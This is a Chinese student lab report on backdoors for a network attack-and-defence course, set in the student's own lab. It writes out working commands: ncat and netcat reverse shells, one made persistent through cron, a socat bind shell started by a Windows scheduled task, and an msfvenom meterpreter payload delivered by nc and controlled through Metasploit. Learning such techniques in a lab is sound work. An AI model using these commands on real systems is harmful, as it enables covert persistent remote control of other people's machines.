2018-2019-2 20162318《网络对抗技术》Exp2 后门原理与实践
一、实验内容1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shell,任务计划启动 3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝 二、实验步骤2.1 使用netcat获取主机操作Shell,cron启动2.1.1 windows下获得一个linux shellstep1. 在Windows中使用ipconfig查看本机ip地址 step2. 在Windows中使用ncat.exe程序打开监听 ncat.exe -l -p 2318 step3. 在kali中反弹连接Windows ncat 192.168.88.1 2318 -e /bin/sh step4. Windows成功获得kali的shell,并使用ls命令查看当前目录 2.1.2 Linux 下获得Windows的cmd程序,cron启动step1. ncat.exe -l -p 2318 step2.在Kali环境下,用crontab -e指令编辑一条定时任务,选择编辑器时选择3 step3.在最后一行添加 10 * * * * /bin/netcat 192.168.88.1 2318 -e /bin/sh //在每小时的第10分钟反向连接Windows主机的2318端口 step4.时间到达10分时,如下图所示: 2.2 使用socat获取主机操作Shell,任务计划启动2.2.1 Linux 下获得Windows的cmd程序step1.在kali中使用ifconfig查看IP step2.在kali中打开监听 nc -l -p 2318 step3.在Windows中反弹连接kali ncat.exe -e cmd.exe 192.168.187.128 2318 step4.kali成功获得Windows的命令提示,并使用dir命令查看当前目录 2.2.2 使用socat获取主机操作Shell,任务计划启动step1.在“任务计划程序”中“创建任务” step2.填写任务名 step3.填写触发器 step4.填写操作,导入socat.exe的路径,并添加参数:tcp-listen:2318 exec:cmd.exe,pty,stderr(把cmd.exe绑定到端口2318,同时把cmd.exe的stderr重定向到stdout上) step5.到达约定时间后,在Kali环境下输入指令 socat -tcp:192.168.88.1:2318 此时可以发现已经成功获得了WINDOWSd的cmd shell 2.3 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shellstep1.在Kali上执行指令 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.187.128 LPORT=2318 -f exe > 20162318_backdoor.exe step2.在Windows下执行 ncat.exe -lv 2318 > 20162318_backdoor.exe step3.在Linux中执行 nc 192.168.88.1 2318 < 20162318_backdoor.exe step4.在Kali上输入msfconsole指令进入msf控制台 [email?protected]:~# msfconsole step5.依次输入 use exploit/multi/handler //使用监听模块,设置payload set payload windows/meterpreter/reverse_tcp /使用和生成后门程序时相同的payload set LHOST 192.168.187.128 //设置ip set LPORT 2318 //设置端口 step6.使用exploit开始监听 step7.运行Windows下的后门程序 step8.Linux获得Windows主机的连接,并且得到了远程控制的shell 2.4使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权step1.完成2.3的全部操作 step2.使用screenshot指令进行截屏 step3.尝试提权和获取摄像头权限失败 三、基础问题回答(1)例举你能想到的一个后门进入到你系统中的可能方式?
(2)例举你知道的后门如何启动起来(win及linux)的方式?
(3)Meterpreter有哪些给你映像深刻的功能
(4)如何发现自己有系统有没有被安装后门?
四、实验总结与体会本次实验使我明白了后门的可怕之处,所以以后要在正规网站下载正规软件,不下载游戏外挂之类可能会藏有后门的软件,其次是定期使用杀毒软件进行杀毒,防止存在有后门软件的软件的存在。 (编辑:李大同) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
- Windows Azure开发存储blob服务不启动
- windows-server-2003 – 移动Windows 2003启动系统分区
- 在窗口上具有扇区精度的原始副本
- windows-server-2008 – 在没有SmartStart的HP Proliant服务
- windows – 批量从文件名中删除括号
- windows-server-2008-r2 – 更换软件raid的磁盘0后无法启动
- 如何在Windows网络上为我的Ubuntu计算机提供域名?
- Windows中的Vagrant ssh:ssh_exchange_identification
- 以编程方式扩展Windows Azure角色
- 如何在Windows远程桌面会话中最大化窗口